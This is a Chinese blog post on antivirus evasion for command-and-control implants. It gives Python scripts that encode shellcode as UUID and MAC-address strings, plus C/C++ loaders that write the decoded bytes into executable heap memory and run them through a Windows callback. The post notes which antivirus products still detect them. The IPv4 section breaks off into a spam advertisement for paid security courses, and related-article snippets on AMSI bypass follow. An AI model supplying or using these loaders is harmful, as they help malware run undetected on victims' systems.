免杀对抗-C2远控篇&C&C++&SC转换格式&UUID标识&MAC物理&IPV4地址&减少熵值(1)

最新推荐文章于 2024-06-05 15:16:35 发布
最新推荐文章于 2024-06-05 15:16:35 发布
阅读量345 收藏 5
点赞数 4
分类专栏: 2024年程序员学习 文章标签: c语言 c++ macos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83740129/article/details/137733937
版权

参考文章:

https://github.com/INotGreen/Bypass-AMSI
https://mp.weixin.qq.com/s/oJ8eHdX8HGuk6dZv0kmFxg
https://kyxiaxiang.github.io/2022/12/14/AMSIandEtw
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

文章参考:

https://www.anquanke.com/post/id/262666

C/C++内存加载-UUID方式-ShellCode转换

通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。

1、先用python代码将shellcode转换成uuid值
2、命令python u.py payload.bin

from uuid import UUID
import sys

if len(sys.argv) < 2:
    print("Usage: %s <shellcode\_file>" % sys.argv[0])
    sys.exit(1)
with open(sys.argv[1], "rb") as f:
    chunk = f.read(16)
    print("{}const char\* uuids[] =".format(' '\*4))
    print(" {")
    while chunk:
        if len(chunk) < 16:
            padding = 16 - len(chunk)
            chunk = chunk + (b"\x90" \* padding)
            print("{}\"{}\"".format(' '\*8,UUID(bytes_le=chunk)))
            break
        print("{}\"{}\",".format(' '\*8,UUID(bytes_le=chunk)))
        chunk = f.read(16)
    print(" };")

3、将uuid值填入const char* uuids[] = { “xxx” };

#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
using namespace std;

const char\* uuids[] = { "xxx" };


int main() {
	HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	void\* hmem = HeapAlloc(hHeap, 0, 0x1000);
	printf("%p\n", hmem);
	DWORD_PTR ptr = (DWORD_PTR)hmem;
	int init = sizeof(uuids) / sizeof(uuids[0]);
	for (int i = 0; i < init; i++) {
		RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID\*)ptr);
		if (status != RPC_S_OK) {
			printf("UuidFromStringA != RPC\_S\_OK\n");
			CloseHandle(hmem);
			return -1;
		}
		ptr += 16;
	}
	printf("[+] HexDump: \n");
	for (int i = 0; i < init \* 16; i++) {
		printf("%02X ", ((unsigned char\*)hmem)[i]);
		//((unsigned char\*)hmem)[i] ^= 0x39;
	}
	EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);
	CloseHandle(hmem);
	return 0;
}

4、生成文件exe,可以上线,但是杀软被杀
火绒 分离uuid
360 检测UuidFromStringA 使用动态api hook

先使用工具studype查看导出表
在这里插入图片描述

UuidFromStringA函数在RPCRT4.dll里面

C/C++内存加载-MAC方式-ShellCode转换

MAC地址也叫物理地址、硬件地址,由网络设备制造商生产时烧录在网卡的EPROM一种闪存芯片,通常可以通过程序擦写。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。

from macaddress import MAC
import sys

if len(sys.argv) < 2:
    print("Usage: %s <shellcode\_file>" % sys.argv[0])
    sys.exit(1)
with open(sys.argv[1], "rb") as f:
    chunk = f.read(6)
    print("{}const char\* MAC[] =".format(' '\*4))
    print(" {")
    while chunk:
        if len(chunk) < 6:
            padding = 6 - len(chunk)
            chunk = chunk + (b"\x90" \* padding)
            print("{}\"{}\"".format(' '\*8,MAC(chunk)))
            break

        print("{}\"{}\",".format(' '\*8,MAC(chunk)))
        chunk = f.read(6)
    print(" };")


#include <Windows.h>
#include <stdio.h>
#include <Ip2string.h>
#pragma comment(lib, "Ntdll.lib")
#ifndef NT\_SUCCESS
#define NT\_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
#define \_CRT\_SECURE\_NO\_WARNINGS
#pragma warning(disable:4996)

int Error(const char\* msg) {
	printf("%s (%u)", msg, GetLastError());
	return 1;
}
int main() {
    const char\* MAC[] =
    {
         xxxx
    };
	int rowLen = sizeof(MAC) / sizeof(MAC[0]);
	PCSTR Terminator = NULL;
	DL_EUI48\* LpBaseAddress2 = NULL;
	NTSTATUS STATUS;
	HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	void\* hmem = HeapAlloc(hHeap, 0, 0x1000);
	DWORD_PTR ptr = (DWORD_PTR)hmem;
	for (int i = 0; i < rowLen; i++) {
		STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator,
			(DL_EUI48\*)ptr);
		if (!NT\_SUCCESS(STATUS)) {
			printf("[!] RtlEthernetStringToAddressA failed in %s result %x(% u)", MAC[i], STATUS, GetLastError());
			return FALSE;
		}
		ptr += 6;
	}
	printf("[+] HexDump: \n");
	for (int i = 0; i < 6 \* rowLen; i++) {
		printf("%02X ", ((unsigned char\*)hmem)[i]);
	}
	EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);
	CloseHandle(hmem);
	return 0;
}

C/C++内存加载-IPV4方式-ShellCode转换

IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址。

1、先用python代码将shellcode转换成ipv4值
2、命令python u.py payload.bin

from ipaddress import ip_address
import sys



**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/a620840c5267131bf1d891ed4bfa26aa.png)
![img](https://img-blog.csdnimg.cn/img_convert/5b55b24a419ce8a73259e4f5212434a0.png)
![img](https://img-blog.csdnimg.cn/img_convert/d126fea3b9ecc88eba0a78501a85f4ce.png)
![img](https://img-blog.csdnimg.cn/img_convert/ad199ca547e48cd7645abf751e9fbd27.png)
![img](https://img-blog.csdnimg.cn/img_convert/6f9b077ef01ef895120ad5c2433fb7f9.png)
![img](https://img-blog.csdnimg.cn/img_convert/c3ccdc4c5b426ea2b89f45c27930bc3a.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
![img](https://img-blog.csdnimg.cn/img_convert/dad2d501b9d20e1b85ed0b59e53601c4.png)

适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
[外链图片转存中...(img-EjOeKB7F-1713051351613)]
2401_83740129
关注
专栏目录
一款轻松免杀主流杀软的c2框架
Gamma_lab的博客
06-30 2639
前言 恕我直言,cs 无论是马或者源文件都被分析烂了,且 cs 的行为太明显了,必 须要大改特改才能满足现在的红蓝对抗,但是想大改谈何容易,所以最快的方 法是寻找一款新的 c2 框架,说白了,远控自己都能写一个出来,执行一些简单 操作还是可以的。 故事从现在开始 最佳有一款老外开发的猎鹰 c2 框架说是要在下周发布,看着很吊的样子,我们 拭目以待,今天要介绍的一款好玩的用 rust 语言开发的 c2 框架,是我无意间 逛 github 上面看到的,这里我记录一下此框架的使用:为啥我会选择这个框 架,因为它是
免杀对抗-C2远控&PowerShell&C#&对抗AV-EDR&停用AMSI接口&阻断ETW跟踪&调用
qq_45087791的博客
03-13 1007
assembly .我们的工具包被曝光。AMSI-Windowsxx版本后提供的自带的反病毒接口,对于以下操作会进行检查(其中国外杀毒,各种EDR集成接口调用),如果渗透中要用到这些操作功能就会受到检测,所以我们要尝试阻断绕过AMSI,其中检测的函数封装在amsi.dll->AmsiScanBuffer故amsi.dll中AmsiScanBuffer()函数尝试运行时让其直接返回0失效。如今越来越多的防病毒厂商正在接入AMSI防病毒接口,因此在当下,如何去规避AMSI,成为红队渗透测试者不可避免的话题。
利用Ladon实现C2免杀所有杀软
K8哥哥
07-11 671
前言 写了几无回显命令执行漏洞Ladon回显方法,接下来我们它升级,既然我们可以通过漏洞执行无回显命令都可以得到回显,那么我们自己写的程序不是更轻而易举吗?所谓远控不过就是通过各种协议传输攻击者的操作指令与结果而已。早期都是用TCP协议实现,之后FTP、HTTP(什么网盘、邮箱、博客等都是并非什么新方式只是换个网址或API而已),大家常用的CS也是HTTP协议,本文用Ladon来实现个简单的C2。 启动WEB Ladon web 800 参数 /ip.txt or ip.jpg Get T
[免杀]基于python的uuid加载器
3tefanie丶zhou的博客
04-02 4094
【开玩笑没关系,但是切记言多必失。】
实战shell免杀&C2远控&工具魔改(免杀日记 - 上
最新发布
guanjian_ci的博客
06-05 3848
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
xiaoheizi的博客
09-24 1711
无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。
duplicate-uuid:Cordova&Bleno项目将使用重复的UUID测试蓝牙LE服务
05-09
蓝牙LE重复UUID 和项目使用重复的UUID测试Bluetooth LE服务,从而导致产生错误。 参见和 。 运行蓝牙服务 $ cd bleno $ npm install $ node . 科尔多瓦 $ cordova plugin install cordova-plugin-ble-central $ ...
uuid.rar_C获得UUID_UUID C_c生成uuid_c语言生成uuid_uuid
09-24
标题“uuid.rar_C获得UUID_UUID C_c生成uuid_c语言生成uuid_uuid”表明这是一个关于使用C语言实现UUID生成的资源包。这个压缩包可能包含了一个C语言编写的程序或库,可以用来在Windows平台上(通过VC6编译器)生成...
LENOVO_VBKE系列机型SN&amp;SLP;&amp;UUID;工具操作手册.rar
08-24
在计算机系统中,UUID常用于创建唯一的对象标识,特别是在分布式系统中。在硬件设备上,UUID可能用于区分不同的组件或驱动程序。用户可能需要了解UUID的作用,以及如何通过工具获取和识别UUID。 4. **操作手册**:...
uuid-1.6.2.tar.gz
11-16
UUID,全称Universally Unique Identifier,是用于唯一标识网络中的对象的一种标识符。在数据库系统中,UUID常常被用来创建全局唯一的序列号,避免不同系统间的冲突。在PostgreSQL数据库中,uuid-ossp扩展提供了生成...
免杀专题(四)UUID加载
weixin_47224111的博客
12-30 1217
免杀专题(四)UUID加载 UUID: 通用唯一标识符 ( Universally Unique Identifier ), 对于所有的UUID它可以保证在空间和时间上的唯一性. 它是通过MAC地址, 时间戳, 命名空间, 随机数, 伪随机数来保证生成ID的唯一性, 有着固定的大小( 128 bit ). 它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID. UUID可以被用作多种用途, 既可以用来短时间内标记一个对象, 也可以可靠的辨别网络中的持久性对象. python有根据十六进制字符
免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4
xiaoheizi的博客
09-26 1713
IP地址MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4使用32位(4字节)地址。介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。此shellcode转换uuid的方法还可以使用:C# Python2 Go 等语言的shellcode加载器实施免杀。2.使用32位的加载器执行,将uuid类型的shellcode放到如下加载器中。
Windows下免杀思路总结
m0_60571990的博客
12-05 1570
Windows下免杀思路总结
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 824
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
小迪安全-免杀对抗+红队APT
m0_73767545的博客
06-03 524
就是利用字眼,对官网域名进行修改,在.com后加上其他字符,例如.com.cn。判断邮箱是否有spf验证(对IP进行校验,满足即可发送),如果无即可伪造。nslookup -type=txt 邮箱域名后缀。
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell&魔改冰蝎&打乱特征指纹&新增加密协议&过后门查杀&过流量识别
HACKONE的博客
05-27 181
1、webshell工具里面的后门代码不被杀毒检测到-混淆。2、webshell工具里面的功能操作不被杀毒拦截到-魔改。3、webshell工具里面的操作连接不被平台捕获到-魔改。1、环境部署-JAR反编译&打包构建-项目即成功。2、魔改冰蝎-防识别-打乱特征指纹-使用即变异。3、魔改冰蝎-防查杀-新增加密协议-生成即免杀。解决1:绕过识别(魔改打乱特征,新增加密算法)2、反编译打包环境-IDEA安装&反编译工具。新建-填入-保存-分享-导入项目-构建编译。魔改冰蝎-防识别-打乱特征指纹。
【安全研究】免杀对抗之源码免杀
weixin_46591320的博客
05-16 2798
0x01 免杀分类 渗透测试中常需要免杀马,这块的内容交叉且形式多样。常见的免杀方式,源码混淆、DLL文件替换、文件修改、加壳、花指令免杀、签名等。免杀的内容比较偏向破解、反编译范畴的安全研究,也是武器库中的必不可少的部分。本文章是系列教程,各种免杀方式都会涉及,本次分享的是源码免杀。 0x02 源码免杀 这里以Python做免杀为例,其他语言如C#、GO、Ruby等免杀思路相同。 免杀的大致步骤可以分为如下,视情况可以采用部分步骤: 加载器选择-ctypes-DLL&amp;其他,加载shellcode
(记录向)Python_MAC加密&C++还原免杀(国内杀软基本通杀)
daxi0ng的博客
09-02 1104
国内杀软基本通杀
APT级全面免杀与企业纵深防御体系的红蓝对抗
悦分享
08-03 775
本文通过模拟APT演示了高级威胁的全面免杀能力,并站在防御者角度思考如何发现、检测和防御高级威胁攻击,从而了解到攻防的对抗性,体会了企业建设纵深防御体系的重要性。
Keiko uuid-shortener:RFC 4122 UUID快速缩短解决方案
资源摘要信息:"uuid-shortener是一个旨在简化RFC 4122标准UUID(通用唯一识别码)的库,它能够将标准的36字符长的UUID转换为一个更短的字符串表示形式。对于那些需要在系统中使用更短标识符的场景,这种库提供了便利...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值